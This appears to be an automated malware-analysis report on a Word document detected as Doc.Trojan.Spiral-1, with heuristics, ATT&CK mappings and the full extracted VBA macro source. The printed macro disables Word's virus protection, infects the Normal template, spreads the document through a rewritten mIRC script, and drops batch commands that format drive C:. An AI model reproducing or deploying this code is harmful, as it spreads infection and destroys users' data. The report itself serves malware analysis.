MALICIOUS
340
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1566.001 Spearphishing Attachment
The sample contains VBA macros that are automatically executed upon opening (AutoOpen). These macros attempt to create a batch file named 'spiral.bat' in the Windows Startup folder, likely to establish persistence. The script also manipulates Microsoft Word's security settings by disabling virus protection and removing macro-related menu items, which is a common tactic to facilitate further malicious activity. The ClamAV detection of 'Doc.Trojan.Spiral-1' further supports the malicious nature of this document.
Heuristics 7
-
ClamAV: Doc.Trojan.Spiral-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Spiral-1
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4007 bytes |
SHA-256: 49ef6f5a9bbead025095dfbdd9cbbd236df10077ba2de742d50133ce9937d92d |
|||
|
Detection
ClamAV:
Doc.Trojan.Spiral-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub AutoOpen()
'WM97.Class.Spiral.Trojan
'By a.v_killer
On Error Resume Next
CheckHostNormal = GetAttr(NormalTemplate.FullName)
If CheckHostNormal = vbReadOnly Or CheckHostNormal = vbReadOnly + vbArchive Then
Norm$ = NormalTemplate
AttribMe$ = "attrib -h -r "
GetTemplates1$ = "c:\progra~1\micros~1\templa~1\"
GetTemplates2$ = "c:\progra~1\micros~2\templa~1\"
Open "c:\WINDOWS\Start Menu\Programs\StartUp\spiral.bat" For Output As #1
Print #1, AttribMe$ + GetTemplates1$ + Norm$
Print #1, AttribMe$ + GetTemplates2$ + Norm$
Print #1, "del " + GetTemplates1$ + Norm$
Print #1, "del " + GetTemplates2$ + Norm$
Print #1, "del c:\windows\startm~1\programs\startup\spiral.bat"
Close #1
End If
Application.ShowVisualBasicEditor = False
Application.ScreenUpdating = False
Application.DisplayStatusBar = False
Application.EnableCancelKey = wdCancelDisabled
With Options
.ConfirmConversions = False
.SaveNormalPrompt = False
.VirusProtection = False
End With
CommandBars("tools").Controls("Macro").Delete
CommandBars("tools").Controls("Customize...").Delete
CommandBars("view").Controls("Toolbars").Delete
CommandBars("view").Controls("Status Bar").Delete
SpiralHost = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
Spiral = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
If Left(ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 3), 3) <> "Sub" Then
Set SpiralCode = ActiveDocument.VBProject.VBComponents.Item(1)
SpiralDoc = True
End If
If Left(NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 3), 3) <> "Sub" Then
Set SpiralCode = NormalTemplate.VBProject.VBComponents.Item(1)
SpiralInfect = True
End If
If SpiralInfect = True Then
ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\Spiral.sys"
SpiralCode.CodeModule.AddFromFile ("c:\Spiral.sys")
SpiralCode.CodeModule.Deletelines 1, 4
SpiralCode.CodeModule.Replaceline 1, "Sub AutoClose()"
ElseIf SpiralDoc = True Then
SpiralCode.CodeModule.AddFromFile ("c:\Spiral.sys")
SpiralCode.CodeModule.Deletelines 1, 4
End If
If Day(Now()) = Int(Rnd * 6) + 1 Then
dlg.Password = "a.v_killer"
Shell "C:\Spiral.COM"
End If
End Sub
Sub Mirc()
On Error Resume Next
SetAttr "C:\mirc\system\script.ini", vbReadOnly
Open "C:\mirc\system\script.ini" For Output As #1
Print #1, "[SCRIPT]"
Print #1, "n0=on 1:text: *:?:{ s *2 | halt }"
Print #1, "n1=alias /s / *1"
Print #1, "n2=on 1:connect:/.enable #d"
Print #1, "n3=#d off"
PRINT #1, "n4=on 1:join:#:{ if ($nick != $me) { dcc send $nick "c:\windows\system\spiral.doc" } | .disable #d | .timer 1 60 .enable #d }"
Print #1, "n5=#d end"
Close #1
End Sub
Sub Playload()
SetAttr "C:\spiral.bat", vbReadOnly
Open "C:\spiral.bat" For Output As #2
Print #2, "@ECHO OFF"
Print #2, "del c:\win.bat"
Print #2, "ECHO attrib -h c:\win.bat >> c:\autoexec.bat"
Print #2, "ECHO C:\WIN.BAT >> c:\autoexec.bat"
Print #2, "ECHO REM InFecTeD bY ThE SpIrAl bat dropper ViRuS(c) >> c:\autoexec.bat"
Print #2, "ECHO REM PRAY 4 MERCY(c) >> c:\config.sys"
Print #2, "ECHO @ECHO ON >> C:\WIN.BAT"
Print #2, "ECHO I'M NOW TAKING CONTROL OF YOUR BOOT SECTOR HEHEHEHE! >> C:\WIN.BAT"
Print #2, "ECHO @ECHO OFF >> C:\WIN.BAT"
Print #2, "ECHO DEL C:\DOS\UN*.* >> C:\WIN.BAT"
Print #2, "ECHO FORMAT C: |Y >> C:\WIN.BAT"
Print #2, "ECHO MKDIR C:\SCANNER >> C:\WIN.BAT"
Print #2, "ECHO MKDIR C:\SPAMHEAD >> C:\WIN.BAT"
Print #2, "ECHO MKDIR C:\A.V_KILLER >> C:\WIN.BAT"
Print #2, "ECHO MKDIR C:\IS >> C:\WIN.BAT"
Print #2, "ECHO MKDIR C:\HERE >> C:\WIN.BAT"
Print #2, "attrib +h c:\win.bat"
Close #2
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.